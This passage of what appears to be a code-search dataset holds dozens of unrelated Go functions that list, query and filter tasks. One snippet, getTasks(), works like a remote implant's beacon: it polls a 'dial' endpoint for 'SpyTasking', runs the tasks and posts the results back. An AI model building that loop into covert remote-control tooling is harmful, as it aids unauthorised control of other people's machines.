math.Float64bits(lastResult.Quality))\n\t\t\tcase \"quality-train\":\n\t\t\t\tb = make([]byte, 8)\n\t\t\t\tbinary.BigEndian.PutUint64(b, math.Float64bits(lastResult.QualityTrain))\n\t\t\tcase \"quality-expected\":\n\t\t\t\tb = make([]byte, 8)\n\t\t\t\tbinary.BigEndian.PutUint64(b, math.Float64bits(lastResult.QualityTrain))\n\t\t\tcase \"status\":\n\t\t\t\tb = []byte(lastResult.Status)\n\t\t\tcase \"stage\":\n\t\t\t\tb = []byte(lastResult.Stage)\n\t\t\t}\n\t\t\tencoded = hex.EncodeToString(b)\n\t\t\tnextCursor = encoded + \"-\" + nextCursor\n\t\t}\n\t}\n\n\t// Assemble the results.\n\tresult = allResults\n\tcm = CollectionMetadata{\n\t\tTotalResultSize: resultSize,\n\t\tReturnedResultSize: len(result),\n\t\tNextPageCursor: nextCursor,\n\t}\n\treturn\n\n}", "func GetByDateRange(rw http.ResponseWriter, r *http.Request) {\n\tuserID := r.Header.Get(\"userid\")\n\tstartDate := r.URL.Query().Get(\"startDate\")\n\tendDate := r.URL.Query().Get(\"endDate\")\n\n\t// Validate startDate and endDate\n\tif startDate == \"\" || endDate == \"\" {\n\t\tlog.Printf(\"Invalid params, startDate or endDate is missing\\n\")\n\t\trw.WriteHeader(http.StatusBadRequest)\n\t\trw.Write([]byte(\"Missing startDate or endDate\"))\n\t\treturn\n\t}\n\n\tif _, err := time.Parse(time.RFC3339, startDate); err != nil {\n\t\tlog.Printf(\"Invalid value for startDate\\n\")\n\t\trw.WriteHeader(http.StatusBadRequest)\n\t\trw.Write([]byte(\"Invalid startDate\"))\n\t\treturn\n\t}\n\n\tif _, err := time.Parse(time.RFC3339, endDate); err != nil {\n\t\tlog.Printf(\"Invalid value for endDate\\n\")\n\t\trw.WriteHeader(http.StatusBadRequest)\n\t\trw.Write([]byte(\"Invalid endDate\"))\n\t\treturn\n\t}\n\n\tquery := `SELECT * FROM events\n\t\tWHERE owner_id = $1 AND\n\t\t(start_time BETWEEN $2 AND $3 OR\n\t\tend_time BETWEEN $2 AND $3)`\n\n\trows, err := conn.DB.Query(query, userID, startDate, endDate)\n\tif err != nil {\n\t\tlog.Printf(\"DB error: %s\\n\", err)\n\t\trw.WriteHeader(http.StatusBadRequest)\n\t\trw.Write([]byte(\"Unable to communicate with database\"))\n\t\treturn\n\t}\n\tdefer rows.Close()\n\n\tevents := []Event{}\n\tfor rows.Next() {\n\t\te := Event{}\n\t\tloc := sql.NullString{}\n\t\tnotes := sql.NullString{}\n\n\t\terr = rows.Scan(&e.EventID, &e.Title, &e.StartTime, &e.EndTime, &loc, &notes, &e.OwnerID)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"DB error: %s\\n\", err)\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write([]byte(\"Error reading from database\"))\n\t\t\treturn\n\t\t}\n\n\t\te.Location = loc.String\n\t\te.Notes = notes.String\n\n\t\tevents = append(events, e)\n\t}\n\n\trw.WriteHeader(http.StatusOK)\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tjson.NewEncoder(rw).Encode(events)\n}", "func GetTaskList(res http.ResponseWriter, req *http.Request) {\n\tres.Header().Set(\"Content-Type\", \"application/json\")\n\ttasks := Tasks{Task{\"7E12E3B57A02\", \"FOOUSER\", \"BAR\"}, Task{\"7E12E3B59441\", \"FOOUSER\", \"BAR\"}}\n\tc := TaskList{tasks}\n\toutgoingJSON, err := json.Marshal(c)\n\tif err != nil {\n\t\tlog.Println(err.Error())\n\t\thttp.Error(res, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tres.WriteHeader(http.StatusCreated)\n\tfmt.Fprint(res, string(outgoingJSON))\n}", "func (ctrl *TaskController) GetTasks(w http.ResponseWriter, r *http.Request) {\n\tlogrus.Println(\"list tasks\")\n\n\ttasks, err := ctrl.taskDao.GetAll()\n\tif err != nil {\n\t\tlogrus.Error(err)\n\t\tSendJSONError(w, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tSendJSONOk(w, tasks)\n}", "func listAllTasks(file *os.File) {\n\treader := todotxt.NewReader(file)\n\ttasks, err := reader.ReadAll()\n\tutils.Check(err)\n\t//fmt.Printf(\"Tasks: %st\\n\", tasks)\n\n\t// TODO: run the filter command, then sort and mangle output some more\n\n\t// TODO: Build and apply the filter\n\n\t// print output\n\tntasks := reader.Len()\n\tpadding := len(strconv.FormatUint(ntasks, 10))\n\ti := uint64(0)\n\tfor i < ntasks {\n\t\ts := strconv.FormatUint(tasks[i].Id, 10)\n\t\t// TODO: console colours\n\t\tfmt.Printf(\"%s: %s\\n\", utils.PaddingLeft(s, \"0\", padding), tasks[i].Todo)\n\t\ti++\n\t}\n\n\t// if required print verbose info\n\tverbose, err := strconv.Atoi(utils.GetSetting(\"TODOTXT_VERBOSE\"))\n\tutils.Check(err)\n\n\tswitch {\n\tcase verbose == 0:\n\t\treturn\n\tcase verbose >= 1:\n\t\tif verbose > 1 {\n\t\t\t// TODO\n\t\t\tfmt.Printf(\"TODO DEBUG: Filter Command was: %#t\\n\", nil)\n\t\t}\n\t\tfmt.Println(\"--\")\n\t\tfmt.Printf(\"TODO: %d of %d tasks shown\\n\", ntasks, ntasks)\n\t}\n}", "func GetTasks(w http.ResponseWriter, r *http.Request, repo *tasks.TaskRepository) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\ttasks, err := repo.GetAllTasks()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tpresentedTasks := apiIndexTasks(tasks)\n\tjson.NewEncoder(w).Encode(presentedTasks)\n}", "func ListTasks(w http.ResponseWriter, r *http.Request, _ httprouter.Params) {\n\ttasks, err := store.GetTasks()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tb, err := json.Marshal(tasks)\n\tw.WriteHeader(http.StatusOK)\n\tw.Write(b)\n}", "func (b *backend) Tasks(ctx context.Context, tq *entroq.TasksQuery) ([]*entroq.Task, error) {\n\tdefer un(lock(b))\n\n\tnow, err := b.Time(ctx)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"tasks current time\")\n\t}\n\n\tvar items []*hItem\n\n\tif len(tq.IDs) != 0 {\n\t\t// Work by the (likely smaller) ID list, instead of by everything in the queue.\n\t\tfor _, id := range tq.IDs {\n\t\t\titem, ok := b.byID[id]\n\t\t\tif !ok {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif tq.Queue != \"\" && tq.Queue != item.task.Queue {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\titems = append(items, item)\n\t\t}\n\t} else if tq.Queue != \"\" {\n\t\t// Queue specified with no ID filter, get everything.\n\t\titems = b.heaps[tq.Queue].Items()\n\t}\n\n\t// Nothing passed, exit early\n\tif len(items) == 0 {\n\t\treturn nil, nil\n\t}\n\n\tvar tasks []*entroq.Task\n\n\t// By this point, we have already filtered on the ID list if there is one.\n\t// Just apply claimant and limit filters now.\n\tfor _, item := range items {\n\t\tif tq.Limit > 0 && len(tasks) >= tq.Limit {\n\t\t\tbreak\n\t\t}\n\t\tt := item.task\n\t\tif tq.Claimant == uuid.Nil || now.After(t.At) || tq.Claimant == t.Claimant {\n\t\t\tif tq.OmitValues {\n\t\t\t\ttasks = append(tasks, t.CopyOmitValue())\n\t\t\t} else {\n\t\t\t\ttasks = append(tasks, t.Copy())\n\t\t\t}\n\t\t}\n\t}\n\treturn tasks, nil\n}", "func (s *TimerService) GetCompletedTasksForDay(year int, month time.Month, day int, user *models.TeamUser) ([]*models.TaskAggregation, error) {\n\t//log.Printf(\"GetCompletedTasksForDay, Year: %d, Month: %d, Day: %d\", year, month, day)\n\n\ttzOffset := user.SlackUserInfo.TZOffset\n\t//log.Printf(\"GetCompletedTasksForDay, tzOffset: %d\", tzOffset)\n\n\tstartDate := time.Date(year, month, day, 0, 0, 0, 0, time.UTC).Add(time.Duration(tzOffset) * time.Second * -1)\n\tendDate := time.Date(year, month, day, 23, 59, 59, 0, time.UTC).Add(time.Duration(tzOffset) * time.Second * -1)\n\n\t//log.Printf(\"GetCompletedTasksForDay, startDate: %+v\", startDate)\n\t//log.Printf(\"GetCompletedTasksForDay, endDate: %+v\", endDate)\n\n\ttasks, err := s.repository.completedTasksForUser(user.ID.Hex(), startDate, endDate)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn tasks, nil\n}", "func ShowTask(w http.ResponseWriter, r *http.Request, repo *tasks.TaskRepository) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tparams := mux.Vars(r)\n\ttaskID, err := strconv.Atoi(params[\"id\"])\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\ttask, err := repo.GetTask(taskID)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tjson.NewEncoder(w).Encode(apiIndexTask(task))\n}", "func (m *TaskManager) All() []*Task {\n return m.tasks\n}", "func (api *API) QueryTasks(params parameters.QueryTasks) (*types.Tasks, error) {\n\tpath := \"/tasks\"\n\n\tqp, err := query.Values(params)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tdata, err := api.get(path, &qp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn types.NewTasksFromJSON(data)\n}", "func GetTasks() error {\n\treturn db.View(func(tx *bolt.Tx) error {\n\t\t// Assume bucket exists and has keys\n\t\tb := tx.Bucket([]byte(\"Tasks\"))\n\t\tc := b.Cursor()\n\n\t\tfor k, v := c.First(); k != nil; k, v = c.Next() {\n\t\t\tid := binary.BigEndian.Uint64(k)\n\t\t\tfmt.Printf(\"Task number %v: %s\\n\", id, v)\n\t\t}\n\n\t\treturn nil\n\t})\n\n}", "func (c *Client) GetFiltered(qp map[string]string) ([]Task, error) {\n\tresp, err := c.DoGetRequest(\"tasks\", qp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ttasks := Tasks{}\n\terr = json.NewDecoder(resp.Body).Decode(&tasks)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn tasks.Items, nil\n}", "func (t *TaskRPC) SchedList(data shared.TaskRPCData, tasks *[]shared.Task) error {\n\tstart := time.Now()\n\n\tconn := Connections.Get(data.Channel)\n\n\t// Read the sites that this user has access to\n\terr := DB.SQL(`select \n\t\tt.*,\n\t\tm.name as machine_name,\n\t\ts.name as site_name,s.id as site_id,\n\t\tu.username as username\n\t\tfrom task t \n\t\t\tleft join machine m on m.id=t.machine_id\n\t\t\tleft join site s on s.id=m.site_id\n\t\t\tleft join users u on u.id=t.assigned_to\n\t\twhere t.sched_id=$1\n\t\torder by t.startdate`, data.ID).\n\t\tQueryStructs(tasks)\n\n\tif err != nil {\n\t\tlog.Println(err.Error())\n\t}\n\n\tfor k, v := range *tasks {\n\n\t\t// trim the descr field\n\t\tif len(v.Descr) > 80 {\n\t\t\t(*tasks)[k].Descr = v.Descr[:80] + \"...\"\n\t\t}\n\n\t\t// Get the latest thumbnails for this task, if present\n\t\tphotos := []shared.Photo{}\n\t\tDB.SQL(`select id,thumb \n\t\t\tfrom photo \n\t\t\twhere (entity='task' and entity_id=$1) \n\t\t\tor (entity='event' and entity_id=$2) \n\t\t\tor (entity='sched' and entity_id=$3) \n\t\t\torder by type,id desc`, v.ID, v.EventID, v.SchedID).\n\t\t\tQueryStructs(&photos)\n\t\t(*tasks)[k].Photos = photos\n\t}\n\n\tlogger(start, \"Task.SchedList\",\n\t\tfmt.Sprintf(\"Sched %d\", data.ID),\n\t\tfmt.Sprintf(\"%d Tasks\", len(*tasks)),\n\t\tdata.Channel, conn.UserID, \"task\", 0, false)\n\n\treturn nil\n}", "func (s *BaseAspidaListener) EnterTasks(ctx *TasksContext) {}", "func (t *TaskRepository) ListTask() (tasks []*Task, err error) {\n\terr = t.db.View(func(tx *bolt.Tx) error {\n\t\tb := tx.Bucket([]byte(\"task\"))\n\t\tif b == nil {\n\t\t\treturn nil\n\t\t}\n\t\tc := b.Cursor()\n\n\t\tfor k, v := c.First(); k != nil; k, v = c.Next() {\n\t\t\tfmt.Printf(\"%v. %v\\n\", string(k), string(v))\n\t\t\ttasks = append(tasks, &Task{ID: string(k), Message: string(v)})\n\t\t}\n\t\treturn nil\n\t})\n\treturn tasks, err\n}", "func Tasks(mods ...qm.QueryMod) taskQuery {\n\tmods = append(mods, qm.From(\"\\\"tasks\\\"\"))\n\treturn taskQuery{NewQuery(mods...)}\n}", "func (t *ListTasks) Execute(auth *model.Auth, targetDate string) ([]*db.Task, *db.Family, []*db.User, error) {\n\t// get user id from token\n\tuser, err := t.userRepo.GetUserWhereUsername(auth.UserName)\n\tif err != nil {\n\t\treturn nil, &db.Family{}, nil, err\n\t}\n\n\t// get family\n\tfamilyMember, err := t.memberFamilyRepo.GetMemberFamilyWhereMemberID(user.ID)\n\tif err != nil {\n\t\treturn nil, &db.Family{}, nil, err\n\t}\n\tfamily, err := t.familyRepo.ShowFamily(familyMember.FamilyID)\n\tif err != nil {\n\t\treturn nil, &db.Family{}, nil, err\n\t}\n\n\t// select task\n\tdbTasks, err := t.taskRepo.SelectTaskWhereFamilyIDDate(familyMember.FamilyID, targetDate)\n\tif err != nil {\n\t\treturn nil, &db.Family{}, nil, err\n\t}\n\n\t// get user name being in charge of the task\n\tvar userIDs []uint64\n\tfor _, t := range dbTasks {\n\t\tuserIDs = append(userIDs, t.MemberID)\n\t}\n\ttaskUsers, err := t.userRepo.GetUsersWhereUserIDs(userIDs)\n\tif err != nil {\n\t\treturn nil, &db.Family{}, nil, err\n\t}\n\n\treturn dbTasks, family, taskUsers, nil\n}", "func (w Workspace) Tasks(\n\tctx context.Context,\n\tafter *string,\n\tbefore *string,\n\tfirst *int,\n\tlast *int,\n) (TaskConnection, error) {\n\treturn PaginateTaskIDSliceContext(ctx, w.TaskIDs, after, before, first, last)\n}", "func (ts *TaskServiceImpl) QueryByStatus(user_id string, status uint8, page int) ([]*Task, error) {\n\tvar (\n\t\tid uint32\n\t\tcontent string\n\t\tcomment string\n\t\tstarted time.Time\n\t\tended time.Time\n\t\tstoped time.Time\n\n\t\ttasks []*Task\n\t)\n\n\trows, err := ts.DB.Query(taskSqls[sqlQuerybyStatus], user_id, status, page)\n\tif err != nil {\n\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\tfor rows.Next() {\n\t\tif err := rows.Scan(&id, &content, &comment, &started, &ended, &stoped); err != nil {\n\n\t\t\treturn nil, err\n\t\t}\n\n\t\ttask := &Task{\n\t\t\tID: id,\n\t\t\tUser_id: user_id,\n\t\t\tContent: content,\n\t\t\tComment: comment,\n\t\t\tStarted: started,\n\t\t\tEnded: ended,\n\t\t\tStoped: stoped,\n\t\t\tStatus: status,\n\t\t}\n\t\ttasks = append(tasks, task)\n\t}\n\n\treturn tasks, nil\n}", "func GetAllTasksController(w http.ResponseWriter, r *http.Request) {\n\ttask := new(Task)\n\n\ttasks, err := task.GetAll()\n\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusNotFound)\n\t\treturn\n\t}\n\n\tresponse, _ := json.Marshal(tasks)\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\tw.Write(response)\n}", "func (task SchTask) Query(name string, own bool) []Task {\n\ttaskList := make([]Task, 0)\n\n\tcmd := &exec.Cmd{}\n\tif task.compatibility {\n\t\tcmd = exec.Command(task.bin, _Query.Command, _Query.format, _Query.formatCSV)\n\t} else {\n\t\tcmd = exec.Command(task.bin, _Query.Command, _Query.format, _Query.formatCSV, _Query.noHeader)\n\t}\n\n\toutput, err := cmd.CombinedOutput()\n\tcatch(output, err)\n\n\tif own {\n\t\ttmp := name\n\t\tif name == \"*\" {\n\t\t\ttmp = \"\"\n\t\t}\n\t\tname = task.prefix + tmp\n\t}\n\n\tscanner := bufio.NewScanner(bytes.NewReader(output))\n\tfor scanner.Scan() {\n\t\ttx := strings.Replace(scanner.Text(), \"\\\"\", \"\", -1)\n\n\t\t//skip\n\t\tif task.compatibility && strings.HasPrefix(tx, \"TaskName\") {\n\t\t\tcontinue\n\t\t}\n\n\t\tts := strings.Split(tx, \",\")\n\n\t\ttname := strings.TrimSpace(ts[0])\n\n\t\tif name == \"*\" || name == \"\" || strings.Contains(strings.ToLower(tname), strings.ToLower(name)) {\n\t\t\tdtime := strings.TrimSpace(ts[1])\n\t\t\tstat := strings.TrimSpace(ts[2])\n\t\t\ttaskList = append(taskList, Task{tname, dtime, stat})\n\t\t}\n\t}\n\n\treturn taskList\n}", "func createTaskQuery(sg *SubGraph, uids *task.List, tokens []string,\n\tintersect *task.List) *task.Query {\n\tx.AssertTrue(uids == nil || tokens == nil)\n\tout := &task.Query{\n\t\tAttr: sg.Attr,\n\t\tTokens: tokens,\n\t\tCount: int32(sg.Params.Count),\n\t\tOffset: int32(sg.Params.Offset),\n\t\tAfterUid: sg.Params.AfterUID,\n\t\tDoCount: sg.Params.DoCount,\n\t}\n\tif uids != nil {\n\t\tout.Uids = uids.Uids\n\t}\n\tif intersect != nil {\n\t\tout.ToIntersect = intersect.Uids\n\t}\n\treturn out\n}", "func getTasks() []hackTask {\n\ttasksJSON := apiRequest(\"https://app.hacknplan.com/api/v1/projects/31094/milestones/80780/tasks?categoryId=0\")\n\tvar tasks []hackTask\n\terr := json.Unmarshal(tasksJSON, &tasks)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn tasks\n}", "func Filter(task *task.Task, q query.Query) *ShowTask {\n\tvar subTasks []*ShowTask\n\tfor _, task := range task.SubTasks {\n\t\tsubTask := Filter(task, q)\n\t\tif subTask != nil {\n\t\t\tsubTasks = append(subTasks, subTask)\n\t\t}\n\t}\n\n\t// if SubTask exist, or query correct show parent task\n\tisShow := true\n\tif q != nil {\n\t\tisShow = len(subTasks) != 0 || q.Check(task)\n\t}\n\n\tif isShow {\n\t\treturn &ShowTask{\n\t\t\tTask: task,\n\t\t\tSubTasks: subTasks,\n\t\t}\n\t}\n\n\treturn nil\n}", "func getStepchainTaskResults(ctx context.Context, c *gin.Context, configs models.Configuration, req models.DataTableRequest) models.DatatableBaseResponse {\n\tcollection := mymongo.GetCollection(configs.CollectionNames.ScTask)\n\tvar cpuEffs []models.StepchainTask\n\n\t// Should use SearchBuilderRequest query\n\tsearchQuery := mymongo.SearchQueryForSearchBuilderRequest(&req.SearchBuilderRequest, models.Stepchain)\n\tsortQuery := mymongo.SortQueryBuilder(&req, stepchainUniqueSortColumn)\n\tlength := req.Length\n\tskip := req.Start\n\n\tcursor, err := mymongo.GetFindQueryResults(ctx, collection, searchQuery, sortQuery, skip, length)\n\tif err != nil {\n\t\tutils.ErrorResponse(c, \"Find query failed\", err, \"\")\n\t}\n\tif err = cursor.All(ctx, &cpuEffs); err != nil {\n\t\tutils.ErrorResponse(c, \"stepchainTask cursor failed\", err, \"\")\n\t}\n\t// Get processed data time period: start date and end date that\n\tdataTimestamp := GetDataSourceTimestamp(ctx, c, configs.CollectionNames.DatasourceTimestamp)\n\n\t// Add Links of other services for the workflow/task to the 'Links' column\n\tutilScTaskAddExternalLinks(cpuEffs, dataTimestamp, configs.ExternalLinks)\n\n\ttotalRecCount := getScFilteredCount(ctx, c, collection, searchQuery, req.Draw)\n\tif totalRecCount < 0 {\n\t\tutils.ErrorResponse(c, \"getFilteredCount cursor failed\", err, \"datatables draw value cannot be less than 1, it is: \"+string(rune(req.Draw)))\n\t}\n\tfilteredRecCount := totalRecCount\n\treturn models.DatatableBaseResponse{\n\t\tDraw: req.Draw,\n\t\tRecordsTotal: totalRecCount,\n\t\tRecordsFiltered: filteredRecCount,\n\t\tData: cpuEffs,\n\t}\n}", "func ListTasks(path string, tag string, undoneOnly bool) error {\n\n\ttag = strings.ToLower(strings.TrimSpace(tag))\n\n\t// Read from file\n\ttasks, err := ReadTasks(path)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Print result\n\tfmt.Printf(\"\\nid\\tdate\\t\\tdone\\ttodo\\n\")\n\tfmt.Printf(\"--\\t----\\t\\t----\\t----\\n\")\n\tfor i, task := range tasks {\n\t\tline := fmt.Sprintf(\"%d\\t%s\\t[%s]\\t%s\", i+1, task.Date, task.Done, task.Name)\n\n\t\t// Status filtering\n\t\tif undoneOnly {\n\t\t\tif task.Done == \"x\" {\n\t\t\t\tcontinue // pass for done tasks\n\t\t\t}\n\t\t}\n\n\t\t// Tag filtering\n\t\tif tag != \"\" {\n\t\t\tif strings.Contains(strings.ToLower(line), tag) {\n\t\t\t\t// print\n\t\t\t} else {\n\t\t\t\tcontinue //skip\n\t\t\t}\n\t\t}\n\t\tfmt.Println(line)\n\t}\n\tfmt.Println(\"\")\n\n\treturn nil\n}", "func (ss *StoreService) All(ctx context.Context, in *todo.AllTasksParams, out *todo.TaskList) error {\n\tvar tasks []todo.TaskDefinition\n\treturn ss.Store.View(func(tx *bolt.Tx) error {\n\t\tb := tx.Bucket([]byte(\"todoStore\"))\n\t\ttasks = make([]todo.TaskDefinition, 0, b.Stats().KeyN)\n\t\treturn b.ForEach(func(_, taskData []byte) error {\n\t\t\tvar task *todo.TaskDefinition = &todo.TaskDefinition{}\n\t\t\tif err := json.Unmarshal(taskData, task); err != nil {\n\t\t\t\tss.log.Errorf(\"Error unmarshaling for all tasks: \\n%s\\n\\n%#v\", err.Error(), b.Stats())\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ttasks = append(tasks, *task)\n\t\t\treturn nil\n\t\t})\n\t})\n}", "func (c *Client) GetAll() (*[]Task, error) {\n\tqp := map[string]string{\n\t\t\"skip\": \"0\",\n\t\t\"take\": \"2147483647\",\n\t}\n\tresp, err := c.DoGetRequest(\"tasks\", qp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ttasks := Tasks{}\n\terr = json.NewDecoder(resp.Body).Decode(&tasks)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &tasks.Items, nil\n}", "func (r *versionResolver) Tasks(ctx context.Context, obj *restModel.APIVersion, options TaskFilterOptions) (*VersionTasks, error) {\n\tversionId := utility.FromStringPtr(obj.Id)\n\tpageParam := 0\n\tif options.Page != nil {\n\t\tpageParam = *options.Page\n\t}\n\tlimitParam := 0\n\tif options.Limit != nil {\n\t\tlimitParam = *options.Limit\n\t}\n\tvariantParam := \"\"\n\tif options.Variant != nil {\n\t\tvariantParam = *options.Variant\n\t}\n\ttaskNameParam := \"\"\n\tif options.TaskName != nil {\n\t\ttaskNameParam = *options.TaskName\n\t}\n\tvar taskSorts []task.TasksSortOrder\n\tif len(options.Sorts) > 0 {\n\t\ttaskSorts = []task.TasksSortOrder{}\n\t\tfor _, singleSort := range options.Sorts {\n\t\t\tkey := \"\"\n\t\t\tswitch singleSort.Key {\n\t\t\t// the keys here should be the keys for the column headers of the tasks table\n\t\t\tcase TaskSortCategoryName:\n\t\t\t\tkey = task.DisplayNameKey\n\t\t\tcase TaskSortCategoryStatus:\n\t\t\t\tkey = task.DisplayStatusKey\n\t\t\tcase TaskSortCategoryBaseStatus:\n\t\t\t\tkey = task.BaseTaskStatusKey\n\t\t\tcase TaskSortCategoryVariant:\n\t\t\t\tkey = task.BuildVariantKey\n\t\t\tcase TaskSortCategoryDuration:\n\t\t\t\tkey = task.TimeTakenKey\n\t\t\tdefault:\n\t\t\t\treturn nil, InputValidationError.Send(ctx, fmt.Sprintf(\"invalid sort key: '%s'\", singleSort.Key))\n\t\t\t}\n\t\t\torder := 1\n\t\t\tif singleSort.Direction == SortDirectionDesc {\n\t\t\t\torder = -1\n\t\t\t}\n\t\t\ttaskSorts = append(taskSorts, task.TasksSortOrder{Key: key, Order: order})\n\t\t}\n\t}\n\tbaseVersionID := \"\"\n\tbaseVersion, err := model.FindBaseVersionForVersion(utility.FromStringPtr(obj.Id))\n\tif err != nil {\n\t\treturn nil, InternalServerError.Send(ctx, fmt.Sprintf(\"finding base version id for version '%s': %s\", versionId, err.Error()))\n\t}\n\tif baseVersion != nil {\n\t\tbaseVersionID = baseVersion.Id\n\t}\n\topts := task.GetTasksByVersionOptions{\n\t\tStatuses: getValidTaskStatusesFilter(options.Statuses),\n\t\tBaseStatuses: getValidTaskStatusesFilter(options.BaseStatuses),\n\t\tVariants: []string{variantParam},\n\t\tTaskNames: []string{taskNameParam},\n\t\tPage: pageParam,\n\t\tLimit: limitParam,\n\t\tSorts: taskSorts,\n\t\t// If the version is a patch, we want to exclude inactive tasks by default.\n\t\tIncludeNeverActivatedTasks: !evergreen.IsPatchRequester(utility.FromStringPtr(obj.Requester)) || utility.FromBoolPtr(options.IncludeEmptyActivation) || utility.FromBoolPtr(options.IncludeNeverActivatedTasks),\n\t\tBaseVersionID: baseVersionID,\n\t}\n\ttasks, count, err := task.GetTasksByVersion(ctx, versionId, opts)\n\tif err != nil {\n\t\treturn nil, InternalServerError.Send(ctx, fmt.Sprintf(\"getting tasks for version with id '%s': %s\", versionId, err.Error()))\n\t}\n\n\tvar apiTasks []*restModel.APITask\n\tfor _, t := range tasks {\n\t\tapiTask := restModel.APITask{}\n\t\terr := apiTask.BuildFromService(ctx, &t, nil)\n\t\tif err != nil {\n\t\t\treturn nil, InternalServerError.Send(ctx, fmt.Sprintf(\"converting task item db model to api model: %s\", err.Error()))\n\t\t}\n\t\tapiTasks = append(apiTasks, &apiTask)\n\t}\n\tversionTasks := VersionTasks{\n\t\tCount: count,\n\t\tData: apiTasks,\n\t}\n\treturn &versionTasks, nil\n}", "func (tq *TeamQuery) QueryTasks() *TaskQuery {\n\tquery := (&TaskClient{config: tq.config}).Query()\n\tquery.path = func(ctx context.Context) (fromU *sql.Selector, err error) {\n\t\tif err := tq.prepareQuery(ctx); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tselector := tq.sqlQuery(ctx)\n\t\tif err := selector.Err(); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tstep := sqlgraph.NewStep(\n\t\t\tsqlgraph.From(team.Table, team.FieldID, selector),\n\t\t\tsqlgraph.To(task.Table, task.FieldID),\n\t\t\tsqlgraph.Edge(sqlgraph.M2M, true, team.TasksTable, team.TasksPrimaryKey...),\n\t\t)\n\t\tfromU = sqlgraph.SetNeighbors(tq.driver.Dialect(), step)\n\t\treturn fromU, nil\n\t}\n\treturn query\n}", "func ExecuteQuery(queryString string, tasks []*task.Task) ([]*ShowTask, bool) {\n\tif queryString == \"\" {\n\t\t// default query\n\t\tqueryString = \":omit :overdue \" + time.Now().Format(util.DateTimeFormat)\n\t}\n\n\t// GetCommand expected ' :key value :key value', but option give ':key value :key value'\n\t// so add space to first\n\tquery, queryMap := GetQuery(\" \" + queryString)\n\tshowTasks := Ls(tasks, query)\n\n\t_, ok := queryMap[\"no-sub-tasks\"]\n\tif !ok {\n\t\tShowAllChildSubTasks(showTasks)\n\t}\n\n\t_, isOmit := queryMap[\"omit\"]\n\n\t// if not complete query, show only no completed query\n\t_, isCompleteShow := queryMap[\"complete\"]\n\tif !isCompleteShow {\n\t\tshowTasks = DeleteAllCompletedTasks(showTasks)\n\t}\n\n\treturn showTasks, isOmit\n}", "func getTasks() {\n\n\tif a.Boot {\n\t\tres := updateSettings()\n\t\tif res {\n\t\t\ta.Boot = false\n\t\t}\n\t}\n\n\tbody, err := makePostRequest(\"dial\", nil, Dial{})\n\n\tif err != nil {\n\t\treturn\n\t}\n\n\tvar t TaskList\n\terr2 := json.Unmarshal(body, &t)\n\tif err2 != nil {\n\t\treturn\n\t}\n\n\tif len(t.SpyTasking) > 0 {\n\t\tresults := doTasks(t)\n\t\tif len(results.Results) > 0 {\n\t\t\tbody, _ = makePostRequest(\"post\", nil, results)\n\t\t} else {\n\t\t\treturn\n\t\t}\n\t}\n}", "func (s *RefreshImpl) Task(ctx context.Refresh) *taskDTO.PostTaskRequest {\n\tdto := taskDTO.PostTaskRequest{}\n\tdto.MessageID = constvalue.RefreshTaskID\n\tdto.Name = \"Refresh Enclosure\"\n\tdto.Description = \"Refresh enclosure's settings and component.\"\n\tdto.CreatedByName = \"Enclosure Service\"\n\tdto.CreatedByURI = \"/promise/v1/enclosure\"\n\tdto.TargetName = ctx.GetEnclosure().Name\n\tdto.TargetURI = base.ToEnclosureURI(ctx.GetEnclosure().ID)\n\tfor _, v := range s.sub {\n\t\tstep := taskDTO.PostTaskStepRequest{}\n\t\tstep.MessageID = v.MessageID()\n\t\tstep.Name = v.Name()\n\t\tstep.Description = v.Description()\n\t\tstep.ExpectedExecutionMs = v.ExpectedExecutionMs()\n\t\tdto.TaskSteps = append(dto.TaskSteps, step)\n\t}\n\treturn &dto\n}", "func (h *History) GetTaskList(query map[string]string) (taskInstances []*ResHistoryTaskInstance, err error) {\n\tres, err := h.client.doGet(\"/history/task\", query)\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = h.client.readJsonResponse(res, &taskInstances)\n\treturn\n}", "func (table *Timetable) List() []*Task {\n\ttasks := make([]*Task, 0)\n\tfor _, task := range table.schedule {\n\t\ttasks = append(tasks, task)\n\t}\n\treturn tasks\n}", "func GetTasksHandler(w http.ResponseWriter, r *http.Request) {\n\tjson.NewEncoder(w).Encode(ReadAllTasks())\n\treturn\n}", "func ListAllEvents() error {\n\ttokFile := \"token.json\"\n\t_, err := tokenFromFile(tokFile)\n\tif err != nil {\n\t\treturn err\n\t}\n\tclient, err := GetClientToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\tsrv, err := calendar.New(client)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Unable to retrieve Calendar client: %v\", err)\n\t}\n\tt := time.Now().Format(time.RFC3339)\n\tevents, err := srv.Events.List(\"primary\").ShowDeleted(false).SingleEvents(true).TimeMin(t).MaxResults(10).OrderBy(\"startTime\").Do()\n\tif err != nil 